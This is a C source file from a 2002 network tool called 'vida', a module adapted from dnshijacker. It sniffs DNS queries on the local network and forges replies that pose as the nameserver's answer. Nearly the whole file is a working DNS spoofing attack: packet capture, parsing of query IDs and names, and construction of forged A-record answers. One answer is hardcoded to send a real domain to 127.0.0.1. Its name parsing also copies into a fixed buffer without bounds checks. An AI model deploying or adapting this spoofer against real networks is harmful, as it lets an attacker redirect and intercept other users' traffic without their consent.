/*____________________________________________*\
*                                              *
*                                              *
*                -= vida =-                    *
*       Visual Interactive Datapipe            *
*               no (c) 2002                    *
*                  v.0.7.1                     *
*                                              *
*    coded by                                  *
*    embyte -> embyte@madlab.it                *
*    lesion -> lesion@autisti.org              * 
*                                              *
*    less README for features and more info    *
*                                              *
*    --------------------------------------    *
*                                              * 
*                                              *
*    dnshijacking.c:                           *
*       -ripped from dnshijacker v1.2 of       *
*        pedram amini (pedram@redhive.com)     *
*        and riadacted for Vida                *
*       -sniff && spoof a dns query            *
*                                              *
*                                              *
\*____________________________________________*/
#include "include.h"

void
parse_dns(char *packet)
{
  struct ip *ip;                /* ip header */
  struct udphdr *udp;           /* udp header */
  struct dnshdr *dns;           /* dns header */
  char *data,                   /* pointer to dns payload */
   *data_backup,                /* we modify data so keep orig */
    name[128];                  /* storate for lookup name */
  u_long rdata;                 /* rdata in network byte order */
  int datalen,                  /* length of dns payload */
    c = 1,                      /* used in name extraction */
    i;                          /* loop counter */

  ip = (struct ip *) (packet + offset);
  udp = (struct udphdr *) (packet + offset + LIBNET_IP_H);
  dns = (struct dnshdr *) (packet + offset + LIBNET_IP_H + LIBNET_UDP_H);
  data = (packet + offset + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H);

  /*
   *  we modify the data pointer, so save the original position
   */

  data_backup = data;

  /*
   *  print dns packet source_address:port > destination_address:port
   */

  printf("\ndns activity:        %s:%d > ", inet_ntoa(ip->ip_src),
         ntohs(udp->uh_sport));
  printf("%s:%d", inet_ntoa(ip->ip_dst), ntohs(udp->uh_dport));


  /*
   *  clean out our name array and grab length of name to convert
   */

  memset(name, '\0', sizeof(name));
  datalen = strlen(data);


  /*
   *  convert name...
   *  dns names are of the form 3www7redhive3com
   *  so we start with the first number and drop that many chars into name[]
   *  then we move up the string that many chars and repeat the procedure
   *  we know to stop when we hit a null
   */

  while (c)
  {
    c = (char) *data;
    data++;
    strncat(name, data, c);
    data += c;
    strncat(name, ".", 1);
  }


  /*
   *  restore the data pointer
   */

  data = data_backup;

  /*
   * kill the trailing '.' 
   */
  name[datalen - 1] = '\0';


  /*
   *  are we looking at a question or an answer?
   */

  if (htons(dns->qdcount) > 0 && htons(dns->ancount) == 0)
    printf("\t[%s = ?]", name);
  else if (htons(dns->ancount) > 0)
    printf("\t[%s = real answer]", name);



  /*
   * print seperator 
   */
  printf("\n--");

  /*
   *  bake the cc
   */

  cc.src_address = ip->ip_src.s_addr;
  cc.dst_address = ip->ip_dst.s_addr;
  cc.src_port = udp->uh_sport;
  cc.dst_port = udp->uh_dport;
  cc.dns_id = dns->id;

  /*
   *  we only spoof packets from nameservers
   *  if the source of the question is not a client
   *  we don't waste any time building a packet, simply return
   */

  if (ntohs(cc.dst_port) != 53)
    return;

  /*
   *  check the question type
   *  the question type is stored in the 2 bytes after the variables length name
   *  if the question is not of type A we return since we are only spoofing those type answers
   */

  if (((int) *(data + datalen + 2)) == T_A)
    cc.is_a = 1;
  else
  {
    cc.is_a = 0;
    return;
  }

  /*
   *  we start clean withno answer, also we set the current question
   */

  strncpy(cc.current_question, name, 128);

  printf("la rikiesta e' x %s\n", cc.current_question);
  cc.have_answer = 0;
  if (!strcmp(cc.current_question, "autistici.org"))
  {
    cc.have_answer = 1;
    rdata = libnet_name_resolve("127.0.0.1", 0);
  }

  memcpy(cc.payload, data, datalen + 5);

  memcpy(cc.payload + datalen + 5, data, datalen + 5);

  memcpy(cc.payload + 2 * (datalen + 5), "\x00\x00\x00\x00\x00\x04", 6);

  *((u_long *) (cc.payload + 2 * (datalen + 5) + 6 + 0)) = rdata;

  cc.payload_size = 2 * (datalen + 5) + 10;

}


pcap_t *
set_cap_dev(char *device, char *filter)
{
  unsigned int network, netmask; /* for filter setting */
  struct bpf_program prog;      /* store compiled filter */
  struct pcap_pkthdr pcap_h;    /* pcap packet header */
  pcap_t *capdev;               /* the capture device */
  char errbuf[PCAP_ERRBUF_SIZE]; /* pcap error buffer */

  pcap_lookupnet(device, &network, &netmask, errbuf);

  if ((capdev =
       pcap_open_live(device, SNAPLEN, PROMISC, 1000, errbuf)) == NULL)
  {
    perror("pcap_open_live");
    exit(EXIT_FAILURE);
  }

  /*
   *  we only want to see traffic specified by filter
   *  so compile and set it
   */

  pcap_compile(capdev, &prog, filter, 0, netmask);
  pcap_setfilter(capdev, &prog);

  /*
   *  set datalink offset, EN10MB is all we really need
   */

  switch (pcap_datalink(capdev))
  {
    case DLT_EN10MB:
      offset = 14;
      break;
    case DLT_IEEE802:
      offset = 22;
      break;
    case DLT_FDDI:
      offset = 21;
      break;
    case DLT_NULL:
      offset = 4;
      break;
    default:
      fprintf(stderr, "\n%s bad datalink type", device);
      exit(EXIT_FAILURE);
      break;
  }
  return capdev;
}


/******************************************************************************
 *  spoof_dns                                                                 *
 *                                                                            *
 *  check some conditions, build the actual packet, and write the answer      *
 *  arg1: (int) socket to write on                                            *
 *  ret:  none                                                                *
 ******************************************************************************/
void
spoof_dns(int socket)
{
  struct in_addr src, dst;      /* used for printing addresses */
  int written_bytes,            /* number of bytes written */
    packet_size,                /* size of our packet */
    i;                          /* misc */
  u_char *packet;               /* we build this */

  /*
   *  check the following conditions before spoofing
   *  if any of these conditions are violated then no spoofing is done
   *  - we only want to spoof packets from a nameserver
   *  - we only want to spoof packets from questions of type A
   *  - we only want to spoof packets if we have an answer
   */

  if (ntohs(cc.dst_port) != 53)
    return;

  if (!cc.is_a)
    return;

  if (!cc.have_answer)
    return;


  packet_size = cc.payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;

  libnet_init_packet(packet_size, &packet);
  if (packet == NULL)
  {
    libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
    return;
  }

  /*
   *  ip header construction
   *  source and destination are swapped here because we are spoofing a reply
   */

  libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */
                  0,            /* ip id */
                  0,            /* fragmentation bits */
                  64,           /* ttl */
                  IPPROTO_UDP,  /* protocol */
                  cc.dst_address, /* source address */
                  cc.src_address, /* destination address */
                  NULL,         /* payload */
                  0,            /* payload length */
                  packet);      /* packet buffer */

  /*
   *  udp header construction
   *  source and destination ports are swapped here too
   *
   * during debugging i found that we weren't generating the correct
   * length here, that is why a payload length is included (payload + dns_header)
   * although, from what i know, it really shouldn't be here
   */

  libnet_build_udp(53,          /* source port */
                   ntohs(cc.src_port), /* destination port */
                   NULL,        /* payload */
                   cc.payload_size + 12, /* payload length */
                   packet + LIBNET_IP_H);

  /*
   *  dns header construction
   */

  libnet_build_dns(ntohs(cc.dns_id), /* dns id */
                   0x8580,      /* control flags (QR,AA,RD,RA) */
                   1,           /* number of questions */
                   1,           /* number of answer RR's */
                   0,           /* number of authority RR's */
                   0,           /* number of additional RR's */
                   cc.payload,  /* payload */
                   cc.payload_size, /* payload length */
                   packet + LIBNET_IP_H + LIBNET_UDP_H);

  /*
   *  calculate checksum
   */

  libnet_do_checksum(packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);

  /*
   *  write packet
   */

  written_bytes = libnet_write_ip(socket, packet, packet_size);

  /*
   *  make sure the number of written bytes jives with what we expect
   */

  if (written_bytes < packet_size)
  {
    printf("\nwarning:             ");
    libnet_error(LN_ERR_WARNING, "libnet only wrote %d of %d bytes",
                 written_bytes, packet_size);
    printf("\n--");
  }

  /*
   *  we're done with this packet
   */

  libnet_destroy_packet(&packet);

  /*
   *  announce what we've just done
   *  remember that we've swapped the addresses/ports
   */

  src.s_addr = cc.src_address;
  dst.s_addr = cc.dst_address;

  printf("\nspoofing answer:     %s:%d > ", inet_ntoa(dst),
         ntohs(cc.dst_port));
  printf("%s:%d", inet_ntoa(src), ntohs(cc.src_port));


  printf("\n--");

}
